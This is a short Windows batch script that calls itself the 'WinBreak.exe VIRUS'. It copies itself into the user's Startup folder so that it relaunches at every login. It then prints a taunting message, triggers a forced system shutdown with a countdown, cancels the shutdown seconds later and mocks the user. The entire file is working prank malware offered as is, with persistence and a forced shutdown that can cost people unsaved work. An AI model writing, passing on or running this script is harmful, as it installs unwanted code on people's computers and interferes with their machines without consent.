@echo off setlocal enabledelayedexpansion set cast=You broke windows, Now windows brakes you. :: ================================================================= :: (c)2014 Josh O.N. :: Do Not Distribute; All Rights Reserved :: You broke windows now windows brakes you - WinBreak.exe VIRUS :: ================================================================= set owner= if "%USERDOMAIN%" == "owner-PC" set owner=.owner-PC copy %0 "C:\Users\%username%%owner%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" :loop set repeat=1 set max=44 set cast=You broke windows, Now windows breaks you. call :write shutdown -s -c "You Broke Windows. Now Windows Brakes You!" -t 10 -f timeout /t 7 /NOBREAK >nul shutdown /a set repeat=1 set max=45 set cast=Windows changed it's mind. Your off the hook. call :write pause exit :write if "%repeat%" == "%max%" endlocal & exit /b set /a repeat=%repeat%+1 set write=!cast:~0,%repeat%! cls echo !write! ping localhost -n 1 >nul call :write